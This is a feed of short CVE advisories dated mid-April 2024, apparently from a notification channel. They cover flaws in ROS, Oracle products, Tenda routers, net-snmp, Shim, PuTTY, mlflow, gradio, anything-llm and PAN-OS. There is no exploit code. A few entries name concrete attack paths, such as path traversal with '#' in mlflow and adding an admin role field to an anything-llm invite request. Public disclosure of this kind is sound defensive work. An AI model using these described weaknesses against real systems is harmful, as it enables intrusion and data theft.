🚨 CVE-2023-33565ROS2 (Robot Operating System 2) Foxy Fitzroy ROS_VERSION=2 and ROS_PYTHON_VERSION=3 are vulnerable to Denial-of-Service (DoS) attacks. A malicious user potentially exploited the vulnerability remotely and crashed the ROS2 nodes. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 01:37:32 |
🚨 CVE-2024-30663An issue was discovered in the default configurations of ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3. This vulnerability allows unauthenticated attackers to gain access using default credentials, posing a serious threat to the integrity and security of the system. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 01:37:26 |
🚨 CVE-2024-30662An issue was discovered in ROS (Robot Operating System) Melodic Morenia in ROS_VERSION 1 and ROS_PYTHON_VERSION 3, where the system transmits messages in plaintext. This flaw exposes sensitive information, making it vulnerable to man-in-the-middle (MitM) attacks, and allowing attackers to easily intercept and access this data. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 01:37:25 |
🚨 CVE-2024-29442An unauthorized access vulnerability has been discovered in ROS2 Humble Hawksbill versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized access to multiple ROS2 nodes remotely. Unauthorized access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 01:37:24 |
🚨 CVE-2024-29440An unauthorized access vulnerability has been discovered in ROS2 Humble Hawksbill versions where ROS_VERSION is 2 and ROS_PYTHON_VERSION is 3. This vulnerability could potentially allow a malicious user to gain unauthorized access to multiple ROS2 nodes remotely. Unauthorized access to these nodes could result in compromised system integrity, the execution of arbitrary commands, and disclosure of sensitive information. NOTE: this is disputed by multiple third parties who believe there was not reasonable evidence to determine the existence of a vulnerability.🎖@cveNotify |
|
| 2024-04-17 00:37:27 |
🚨 CVE-2024-31680File Upload vulnerability in Shibang Communications Co., Ltd. IP network intercom broadcasting system v.1.0 allows a local attacker to execute arbitrary code via the my_parser.php component.🎖@cveNotify |
|
| 2024-04-17 00:37:26 |
🚨 CVE-2024-31503Incorrect access control in Dolibarr ERP CRM versions 19.0.0 and before, allows authenticated attackers to steal victim users' session cookies and CSRF protection tokens via user interaction with a crafted web page, leading to account takeover.🎖@cveNotify |
|
| 2024-04-16 23:37:32 |
🚨 CVE-2024-31759An issue in sanluan PublicCMS v.4.0.202302.e allows an attacker to escalate privileges via the change password function.🎖@cveNotify |
|
| 2024-04-16 23:37:25 |
🚨 CVE-2024-32036ImageSharp is a 2D graphics API. A data leakage flaw was found in ImageSharp's JPEG and TGA decoders. This vulnerability is triggered when an attacker passes a specially crafted JPEG or TGA image file to a software using ImageSharp, potentially disclosing sensitive information from other parts of the software in the resulting image buffer. The problem has been patched in v3.1.4 and v2.1.8.🎖@cveNotify |
|
| 2024-04-16 23:37:24 |
🚨 CVE-2024-27592Open Redirect vulnerability in Corezoid Process Engine v6.5.0 allows attackers to redirect to arbitrary websites via appending a crafted link to /login/ in the login page URL.🎖@cveNotify |
|
| 2024-04-16 22:37:37 |
🚨 CVE-2024-20997Vulnerability in the Oracle Hospitality Simphony product of Oracle Food and Beverage Applications (component: Simphony Enterprise Server). Supported versions that are affected are 19.1.0-19.5.4. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Hospitality Simphony. While the vulnerability is in Oracle Hospitality Simphony, attacks may significantly impact additional products (scope change). Successful attacks of this vulnerability can result in takeover of Oracle Hospitality Simphony. CVSS 3.1 Base Score 9.9 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H).🎖@cveNotify |
|
| 2024-04-16 22:37:31 |
🚨 CVE-2024-20995Vulnerability in the Oracle Database Sharding component of Oracle Database Server. Supported versions that are affected are 19.3-19.22 and 21.3-21.13. Easily exploitable vulnerability allows high privileged attacker having DBA privilege with network access via Oracle Net to compromise Oracle Database Sharding. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Database Sharding. CVSS 3.1 Base Score 2.4 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:N/A:L).🎖@cveNotify |
|
| 2024-04-16 22:37:30 |
🚨 CVE-2024-20991Vulnerability in the Oracle HTTP Server product of Oracle Fusion Middleware (component: Web Listener). The supported version that is affected is 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle HTTP Server. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle HTTP Server accessible data. CVSS 3.1 Base Score 5.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N).🎖@cveNotify |
|
| 2024-04-16 22:37:26 |
🚨 CVE-2024-20989Vulnerability in the Oracle Hospitality Simphony product of Oracle Food and Beverage Applications (component: Simphony POS). Supported versions that are affected are 19.1.0-19.5.4. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality Simphony. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Hospitality Simphony accessible data as well as unauthorized update, insert or delete access to some of Oracle Hospitality Simphony accessible data and unauthorized ability to cause a partial denial of service (partial DOS) of Oracle Hospitality Simphony. CVSS 3.1 Base Score 7.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:L).🎖@cveNotify |
|
| 2024-04-16 22:37:25 |
🚨 CVE-2024-32036ImageSharp is a 2D graphics API. A data leakage flaw was found in ImageSharp's JPEG and TGA decoders. This vulnerability is triggered when an attacker passes a specially crafted JPEG or TGA image file to a software using ImageSharp, potentially disclosing sensitive information from other parts of the software in the resulting image buffer. The problem has been patched in v3.1.4 and v2.1.8.🎖@cveNotify |
|
| 2024-04-16 22:37:24 |
🚨 CVE-2024-0914A timing side-channel vulnerability has been discovered in the opencryptoki package while processing RSA PKCS#1 v1.5 padded ciphertexts. This flaw could potentially enable unauthorized RSA ciphertext decryption or signing, even without access to the corresponding private key.🎖@cveNotify |
|
| 2024-04-16 20:37:36 |
🚨 CVE-2024-3882A vulnerability was found in Tenda W30E 1.0.1.25(633). It has been classified as critical. Affected is the function fromRouteStatic of the file /goform/fromRouteStatic. The manipulation of the argument page leads to stack-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-260916. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-16 20:37:35 |
🚨 CVE-2024-3881A vulnerability was found in Tenda W30E 1.0.1.25(633) and classified as critical. This issue affects the function frmL7PlotForm of the file /goform/frmL7ProtForm. The manipulation of the argument page leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-260915. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-16 20:37:31 |
🚨 CVE-2024-30380An Improper Handling of Exceptional Conditions vulnerability in Juniper Networks Junos OS and Junos OS Evolved allows an adjacent unauthenticated attacker to cause a Denial of Service (DoS), which causes the l2cpd process to crash by sending a specific TLV.The l2cpd process is responsible for layer 2 control protocols, such as STP, RSTP, MSTP, VSTP, ERP, and LLDP. The impact of the l2cpd crash is reinitialization of STP protocols (RSTP, MSTP or VSTP), and MVRP and ERP, leading to a Denial of Service. Continued receipt and processing of this specific TLV will create a sustained Denial of Service (DoS) condition.This issue affects:Junos OS: all versions before 20.4R3-S9, from 21.2 before 21.2R3-S7, from 21.3 before 21.3R3-S5, from 21.4 before 21.4R3-S4, from 22.1 before 22.1R3-S4, from 22.2 before 22.2R3-S2, from 22.3 before 22.3R2-S2, 22.3R3-S1, from 22.4 before 22.4R2-S2, 22.4R3, from 23.2 before 23.2R1-S1, 23.2R2;Junos OS Evolved: all versions before 21.2R3-S7, from 21.3 before 21.3R3-S5-EVO, from 21.4 before 21.4R3-S5-EVO, from 22.1 before 22.1R3-S4-EVO, from 22.2 before 22.2R3-S2-EVO, from 22.3 before 22.3R2-S2-EVO, 22.3R3-S1-EVO, from 22.4 before 22.4R2-S2-EVO, 22.4R3-EVO, from 23.2 before 23.2R1-S1-EVO, 23.2R2-EVO.🎖@cveNotify |
|
| 2024-04-16 20:37:30 |
🚨 CVE-2022-24810net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can use a malformed OID in a SET to the nsVacmAccessTable to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.🎖@cveNotify |
|
| 2024-04-16 20:37:26 |
🚨 CVE-2022-24808net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can use a malformed OID in a `SET` request to `NET-SNMP-AGENT-MIB::nsLogTable` to cause a NULL pointer dereference. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.🎖@cveNotify |
|
| 2024-04-16 20:37:25 |
🚨 CVE-2022-24806net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a user with read-write credentials can exploit an Improper Input Validation vulnerability when SETing malformed OIDs in master agent and subagent simultaneously. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.🎖@cveNotify |
|
| 2024-04-16 20:37:24 |
🚨 CVE-2022-24805net-snmp provides various tools relating to the Simple Network Management Protocol. Prior to version 5.9.2, a buffer overflow in the handling of the `INDEX` of `NET-SNMP-VACM-MIB` can cause an out-of-bounds memory access. A user with read-only credentials can exploit the issue. Version 5.9.2 contains a patch. Users should use strong SNMPv3 credentials and avoid sharing the credentials. Those who must use SNMPv1 or SNMPv2c should use a complex community string and enhance the protection by restricting access to a given IP address range.🎖@cveNotify |
|
| 2024-04-16 19:37:25 |
🚨 CVE-2020-1570A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer. The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.In a web-based attack scenario, an attacker could host a specially crafted website that is designed to exploit the vulnerability through Internet Explorer and then convince a user to view the website. An attacker could also embed an ActiveX control marked "safe for initialization" in an application or Microsoft Office document that hosts the IE rendering engine. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements. These websites could contain specially crafted content that could exploit the vulnerability.The security update addresses the vulnerability by modifying how the scripting engine handles objects in memory.🎖@cveNotify |
|
| 2024-04-16 19:37:24 |
🚨 CVE-2020-1567A remote code execution vulnerability exists in the way that the MSHTML engine improperly validates input.An attacker could execute arbitrary code in the context of the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited the vulnerability could take control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights.In a HTML editing attack scenario, an attacker could trick a user into editing a specially crafted file that is designed to exploit the vulnerability.The security update addresses the vulnerability by modifying how MSHTML engine validates input.🎖@cveNotify |
|
| 2024-04-16 17:37:30 |
🚨 CVE-2024-32256Phpgurukul Tourism Management System v2.0 is vulnerable to Unrestricted Upload of File with Dangerous Type via /tms/admin/change-image.php. When updating a current package, there are no checks for what types of files are uploaded from the image.🎖@cveNotify |
|
| 2024-04-16 17:37:25 |
🚨 CVE-2024-21676This High severity Injection vulnerability was introduced in versions 7.3.0 of Confluence Data Center. This Injection vulnerability, with a CVSS Score of 8.8, allows an unauthenticated attacker to modify the actions taken by a system call which has high impact to confidentiality, high impact to integrity, high impact to availability, and requires user interaction. Atlassian recommends that Confluence Data Center customers upgrade to latest version, if you are unable to do so, upgrade your instance to one of the specified supported fixed versions: Confluence Data Center 8.5: Upgrade to a release greater than or equal to 8.5.8 See the release notes (https://confluence.atlassian.com/doc/confluence-release-notes-327.html). You can download the latest version of Confluence Data Center from the download center (https://www.atlassian.com/software/confluence/download-archives). This vulnerability was discovered by l3yx and reported via our Bug Bounty program🎖@cveNotify |
|
| 2024-04-16 17:37:24 |
🚨 CVE-2023-40551A flaw was found in the MZ binary format in Shim. An out-of-bounds read may occur, leading to a crash or possible exposure of sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-04-16 16:37:26 |
🚨 CVE-2023-40550An out-of-bounds read flaw was found in Shim when it tried to validate the SBAT information. This issue may expose sensitive data during the system's boot phase.🎖@cveNotify |
|
| 2024-04-16 16:37:25 |
🚨 CVE-2023-40548A buffer overflow was found in Shim in the 32-bit system. The overflow happens due to an addition operation involving a user-controlled value parsed from the PE binary being used by Shim. This value is further used for memory allocation operations, leading to a heap-based buffer overflow. This flaw causes memory corruption and can lead to a crash or data integrity issues during the boot phase.🎖@cveNotify |
|
| 2024-04-16 16:37:24 |
🚨 CVE-2023-40547A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. This flaw is only exploitable during the early boot phase, an attacker needs to perform a Man-in-the-Middle or compromise the boot server to be able to exploit this vulnerability successfully.🎖@cveNotify |
|
| 2024-04-16 13:37:41 |
🚨 CVE-2024-23561HCL DevOps Deploy / HCL Launch is vulnerable to sensitive information disclosure vulnerability due to insufficient obfuscation of sensitive values.🎖@cveNotify |
|
| 2024-04-16 13:37:40 |
🚨 CVE-2024-3804A vulnerability, which was classified as critical, has been found in Vesystem Cloud Desktop up to 20240408. This issue affects some unknown processing of the file /Public/webuploader/0.1.5/server/fileupload2.php. The manipulation of the argument file leads to unrestricted upload. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-260777 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-04-16 13:37:36 |
🚨 CVE-2024-31990Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The API server does not enforce project sourceNamespaces which allows attackers to use the UI to edit resources which should only be mutable via gitops. This vulenrability is fixed in 2.10.7, 2.9.12, and 2.8.16.🎖@cveNotify |
|
| 2024-04-16 13:37:35 |
🚨 CVE-2024-30840A Stack Overflow vulnerability in Tenda AC15 v15.03.05.18 allows attackers to cause a denial of service via the LISTEN parameter in the fromDhcpListClient function.🎖@cveNotify |
|
| 2024-04-16 13:37:31 |
🚨 CVE-2023-45503SQL Injection vulnerability in Macrob7 Macs CMS 1.1.4f, allows remote attackers to execute arbitrary code, cause a denial of service (DoS), escalate privileges, and obtain sensitive information via crafted payload to resetPassword, forgotPasswordProcess, saveUser, saveRole, deleteUser, deleteRole, deleteComment, deleteUser, allowComment, saveRole, forgotPasswordProcess, resetPassword, saveUser, addComment, saveRole, and saveUser endpoints.🎖@cveNotify |
|
| 2024-04-16 13:37:30 |
🚨 CVE-2024-28558SQL Injection vulnerability in sourcecodester Petrol pump management software v1.0, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via crafted payload to admin/app/web_crud.php.🎖@cveNotify |
|
| 2024-04-16 13:37:29 |
🚨 CVE-2024-28557SQL Injection vulnerability in Sourcecodester php task management system v1.0, allows remote attackers to execute arbitrary code, escalate privileges, and obtain sensitive information via crafted payload to update-admin.php.🎖@cveNotify |
|
| 2024-04-16 13:37:26 |
🚨 CVE-2024-24487An issue discovered in silex technology DS-600 Firmware v.1.4.1 allows a remote attacker to cause a denial of service via crafted UDP packets using the EXEC REBOOT SYSTEM command.🎖@cveNotify |
|
| 2024-04-16 13:37:25 |
🚨 CVE-2024-24485An issue discovered in silex technology DS-600 Firmware v.1.4.1 allows a remote attacker to obtain sensitive information via the GET EEP_DATA command.🎖@cveNotify |
|
| 2024-04-16 13:37:24 |
🚨 CVE-2024-1394A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey and ctx. That function uses named return parameters to free pkey and ctx if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the "return nil, nil, fail(...)" pattern, meaning that pkey and ctx will be nil inside the deferred function that should free them.🎖@cveNotify |
|
| 2024-04-16 12:37:35 |
🚨 CVE-2024-3135A Cross-Site Request Forgery (CSRF) vulnerability exists in the mudler/localai application, allowing attackers to craft malicious webpages that, when visited by a victim, perform unauthorized actions on the victim's local LocalAI instance without their consent. This vulnerability enables attackers to exhaust system resources, consume credits, and fill disk space by making numerous resource-intensive API calls, such as generating images or uploading files. The vulnerability stems from the application's acceptance of simple request content-types without requiring CSRF tokens or implementing other CSRF mitigation measures. Successful exploitation does not require network access to the vulnerable LocalAI environment.🎖@cveNotify |
|
| 2024-04-16 12:37:32 |
🚨 CVE-2024-1522A Cross-Site Request Forgery (CSRF) vulnerability in the parisneo/lollms-webui project allows remote attackers to execute arbitrary code on a victim's system. The vulnerability stems from the `/execute_code` API endpoint, which does not properly validate requests, enabling an attacker to craft a malicious webpage that, when visited by a victim, submits a form to the victim's local lollms-webui instance to execute arbitrary OS commands. This issue allows attackers to take full control of the victim's system without requiring direct network access to the vulnerable application.🎖@cveNotify |
|
| 2024-04-16 12:37:31 |
🚨 CVE-2024-1540A command injection vulnerability exists in the deploy+test-visual.yml workflow of the gradio-app/gradio repository, due to improper neutralization of special elements used in a command. This vulnerability allows attackers to execute unauthorized commands, potentially leading to unauthorized modification of the base repository or secrets exfiltration. The issue arises from the unsafe handling of GitHub context information within a `run` operation, where expressions inside `${{ }}` are evaluated and substituted before script execution. Remediation involves setting untrusted input values to intermediate environment variables to prevent direct influence on script generation.🎖@cveNotify |
|
| 2024-04-16 12:37:30 |
🚨 CVE-2024-1455A vulnerability in the langchain-ai/langchain repository allows for a Billion Laughs Attack, a type of XML External Entity (XXE) exploitation. By nesting multiple layers of entities within an XML document, an attacker can cause the XML parser to consume excessive CPU and memory resources, leading to a denial of service (DoS).🎖@cveNotify |
|
| 2024-04-16 12:37:26 |
🚨 CVE-2024-1727A Cross-Site Request Forgery (CSRF) vulnerability in gradio-app/gradio allows attackers to upload multiple large files to a victim's system if they are running Gradio locally. By crafting a malicious HTML page that triggers an unauthorized file upload to the victim's server, an attacker can deplete the system's disk space, potentially leading to a denial of service. This issue affects the file upload functionality as implemented in gradio/routes.py.🎖@cveNotify |
|
| 2024-04-16 12:37:25 |
🚨 CVE-2023-6568A reflected Cross-Site Scripting (XSS) vulnerability exists in the mlflow/mlflow repository, specifically within the handling of the Content-Type header in POST requests. An attacker can inject malicious JavaScript code into the Content-Type header, which is then improperly reflected back to the user without adequate sanitization or escaping, leading to arbitrary JavaScript execution in the context of the victim's browser. The vulnerability is present in the mlflow/server/auth/__init__.py file, where the user-supplied Content-Type header is directly injected into a Python formatted string and returned to the user, facilitating the XSS attack.🎖@cveNotify |
|
| 2024-04-16 12:37:24 |
🚨 CVE-2023-6038A Local File Inclusion (LFI) vulnerability exists in the h2o-3 REST API, allowing unauthenticated remote attackers to read arbitrary files on the server with the permissions of the user running the h2o-3 instance. This issue affects the default installation and does not require user interaction. The vulnerability can be exploited by making specific GET or POST requests to the ImportFiles and ParseSetup endpoints, respectively. This issue was identified in version 3.40.0.4 of h2o-3.🎖@cveNotify |
|
| 2024-04-16 10:37:25 |
🚨 CVE-2024-3867The archive-tainacan-collection theme for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in version 2.7.1. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-04-16 10:37:24 |
🚨 CVE-2024-28834A flaw was found in GnuTLS. The Minerva attack is a cryptographic vulnerability that exploits deterministic behavior in systems like GnuTLS, leading to side-channel leaks. In specific scenarios, such as when using the GNUTLS_PRIVKEY_FLAG_REPRODUCIBLE flag, it can result in a noticeable step in nonce size from 513 to 512 bits, exposing a potential timing side-channel.🎖@cveNotify |
|
| 2024-04-16 09:37:30 |
🚨 CVE-2024-3872Mattermost Mobile app versions 2.13.0 and earlier use a regular expression with polynomial complexity to parse certain deeplinks, which allows an unauthenticated remote attacker to freeze or crash the app via a long maliciously crafted link.🎖@cveNotify |
|
| 2024-04-16 09:37:29 |
🚨 CVE-2024-3871The Delta Electronics DVW-W02W2-E2 devices expose a web administration interface to users. This interface implements two features (access control lists management, WPS pin setup) that are affected by command injections and stack overflows vulnerabilities.Successful exploitation of these flaws would allow remote authenticated attackers to gain remote command execution with elevated privileges on the affected devices.This issue affects DVW-W02W2-E2 through version 2.5.2.🎖@cveNotify |
|
| 2024-04-16 09:37:26 |
🚨 CVE-2024-32634In huge memory get unmapped area check, code can never be reached because of a logical contradiction.🎖@cveNotify |
|
| 2024-04-16 09:37:25 |
🚨 CVE-2024-32631Out-of-Bounds read in ciCCIOTOPT in ASR180X will cause incorrect computations.🎖@cveNotify |
|
| 2024-04-16 09:37:24 |
🚨 CVE-2024-32625In OffloadAMRWriter, a scalar field is not initialized so will contain an arbitrary value left over from earlier computations🎖@cveNotify |
|
| 2024-04-16 07:37:25 |
🚨 CVE-2024-32557Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Exclusive Addons Exclusive Addons Elementor allows Stored XSS.This issue affects Exclusive Addons Elementor: from n/a through 2.6.9.2.🎖@cveNotify |
|
| 2024-04-16 07:37:24 |
🚨 CVE-2024-3764** DISPUTED ** A vulnerability classified as problematic has been found in Tuya SDK up to 5.0.x. Affected is an unknown function of the component MQTT Packet Handler. The manipulation leads to denial of service. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The real existence of this vulnerability is still doubted at the moment. Upgrading to version 5.1.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-260604. NOTE: The vendor explains that a malicious actor would have to crack TLS first or use a legitimate login to initiate the attack.🎖@cveNotify |
|
| 2024-04-16 06:37:24 |
🚨 CVE-2024-22262Applications that use UriComponentsBuilder to parse an externally provided URL (e.g. through a query parameter) AND perform validation checks on the host of the parsed URL may be vulnerable to a open redirect https://cwe.mitre.org/data/definitions/601.html attack or to a SSRF attack if the URL is used after passing validation checks.This is the same as CVE-2024-22259 https://spring.io/security/cve-2024-22259 and CVE-2024-22243 https://spring.io/security/cve-2024-22243 , but with different input.🎖@cveNotify |
|
| 2024-04-16 04:37:25 |
🚨 CVE-2024-31783Cross Site Scripting (XSS) vulnerability in Typora v.1.6.7 and before, allows a local attacker to obtain sensitive information via a crafted script during markdown file creation.🎖@cveNotify |
|
| 2024-04-16 04:37:24 |
🚨 CVE-2024-31634Cross Site Scripting (XSS) vulnerability in Xunruicms versions 4.6.3 and before, allows remote attacker to execute arbitrary code via the Security.php file in the catalog \XunRuiCMS\dayrui\Fcms\Library.🎖@cveNotify |
|
| 2024-04-16 03:37:25 |
🚨 CVE-2023-6814Insertion of Sensitive Information into Log File vulnerability in Hitachi Cosminexus Component Container allows local users to gain sensitive information.This issue affects Cosminexus Component Container: from 11-30 before 11-30-05, from 11-20 before 11-20-07, from 11-10 before 11-10-10, from 11-00 before 11-00-12, All versions of V8 and V9.🎖@cveNotify |
|
| 2024-04-16 03:37:24 |
🚨 CVE-2024-25629c-ares is a C library for asynchronous DNS requests. `ares__read_line()` is used to parse local configuration files such as `/etc/resolv.conf`, `/etc/nsswitch.conf`, the `HOSTALIASES` file, and if using a c-ares version prior to 1.27.0, the `/etc/hosts` file. If any of these configuration files has an embedded `NULL` character as the first character in a new line, it can lead to attempting to read memory prior to the start of the given buffer which may result in a crash. This issue is fixed in c-ares 1.27.0. No known workarounds exist.🎖@cveNotify |
|
| 2024-04-16 01:07:24 |
🚨 CVE-2024-3400A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.🎖@cveNotify |
|
| 2024-04-16 00:37:32 |
🚨 CVE-2024-1483A path traversal vulnerability exists in mlflow/mlflow version 2.9.2, allowing attackers to access arbitrary files on the server. By crafting a series of HTTP POST requests with specially crafted 'artifact_location' and 'source' parameters, using a local URI with '#' instead of '?', an attacker can traverse the server's directory structure. The issue occurs due to insufficient validation of user-supplied input in the server's handlers.🎖@cveNotify |
|
| 2024-04-16 00:37:26 |
🚨 CVE-2024-1456An S3 bucket takeover vulnerability was identified in the h2oai/h2o-3 repository. The issue involves the S3 bucket 'http://s3.amazonaws.com/h2o-training', which was found to be vulnerable to unauthorized takeover.🎖@cveNotify |
|
| 2024-04-16 00:37:25 |
🚨 CVE-2024-0549mintplex-labs/anything-llm is vulnerable to a relative path traversal attack, allowing unauthorized attackers with a default role account to delete files and folders within the filesystem, including critical database files such as 'anythingllm.db'. The vulnerability stems from insufficient input validation and normalization in the handling of file and folder deletion requests. Successful exploitation results in the compromise of data integrity and availability.🎖@cveNotify |
|
| 2024-04-16 00:37:24 |
🚨 CVE-2024-0404A mass assignment vulnerability exists in the `/api/invite/:code` endpoint of the mintplex-labs/anything-llm repository, allowing unauthorized creation of high-privileged accounts. By intercepting and modifying the HTTP request during the account creation process via an invitation link, an attacker can add a `role` property with `admin` value, thereby gaining administrative access. This issue arises due to the lack of property allowlisting and blocklisting, enabling the attacker to exploit the system and perform actions as an administrator.🎖@cveNotify |
|
| 2024-04-15 23:37:25 |
🚨 CVE-2023-33806Insecure default configurations in Hikvision Interactive Tablet DS-D5B86RB/B V2.3.0 build220119, allows attackers to execute arbitrary commands.🎖@cveNotify |
|
| 2024-04-15 23:37:24 |
🚨 CVE-2024-31497In PuTTY 0.68 through 0.80 before 0.81, biased ECDSA nonce generation allows an attacker to recover a user's NIST P-521 secret key via a quick attack in approximately 60 signatures. This is especially important in a scenario where an adversary is able to read messages signed by PuTTY or Pageant. The required set of signed messages may be publicly readable because they are stored in a public Git service that supports use of SSH for commit signing, and the signatures were made by Pageant through an agent-forwarding mechanism. In other words, an adversary may already have enough signature information to compromise a victim's private key, even if there is no further use of vulnerable PuTTY versions. After a key compromise, an adversary may be able to conduct supply-chain attacks on software maintained in Git. A second, independent scenario is that the adversary is an operator of an SSH server to which the victim authenticates (for remote login or file copy), even though this server is not fully trusted by the victim, and the victim uses the same private key for SSH connections to other services operated by other entities. Here, the rogue server operator (who would otherwise have no way to determine the victim's private key) can derive the victim's private key, and then use it for unauthorized access to those other services. If the other services include Git services, then again it may be possible to conduct supply-chain attacks on software maintained in Git. This also affects, for example, FileZilla before 3.67.0, WinSCP before 6.3.3, TortoiseGit before 2.15.0.1, and TortoiseSVN through 1.14.6.🎖@cveNotify |
|
| 2024-04-15 22:37:32 |
🚨 CVE-2024-31651A cross-site scripting (XSS) in Cosmetics and Beauty Product Online Store v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the First Name parameter.🎖@cveNotify |
|
| 2024-04-15 22:37:27 |
🚨 CVE-2024-2424An input validation vulnerability exists in the Rockwell Automation 5015-AENFTXT that causes the secondary adapter to result in a major nonrecoverable fault (MNRF) when malicious input is entered. If exploited, the availability of the device will be impacted, and a manual restart is required. Additionally, a malformed PTP packet is needed to exploit this vulnerability.🎖@cveNotify |
|
| 2024-04-15 22:37:26 |
🚨 CVE-2024-29090Server-Side Request Forgery (SSRF) vulnerability in Jordy Meow AI Engine: ChatGPT Chatbot.This issue affects AI Engine: ChatGPT Chatbot: from n/a through 2.1.4.🎖@cveNotify |
|
| 2024-04-15 21:37:32 |
🚨 CVE-2024-31650A cross-site scripting (XSS) in Cosmetics and Beauty Product Online Store v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Last Name parameter.🎖@cveNotify |
|
| 2024-04-15 21:37:26 |
🚨 CVE-2024-31649A cross-site scripting (XSS) in Cosmetics and Beauty Product Online Store v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Product Name parameter.🎖@cveNotify |
|
| 2024-04-15 21:37:25 |
🚨 CVE-2024-23558HCL DevOps Deploy / HCL Launch does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system.🎖@cveNotify |
|
| 2024-04-15 21:37:24 |
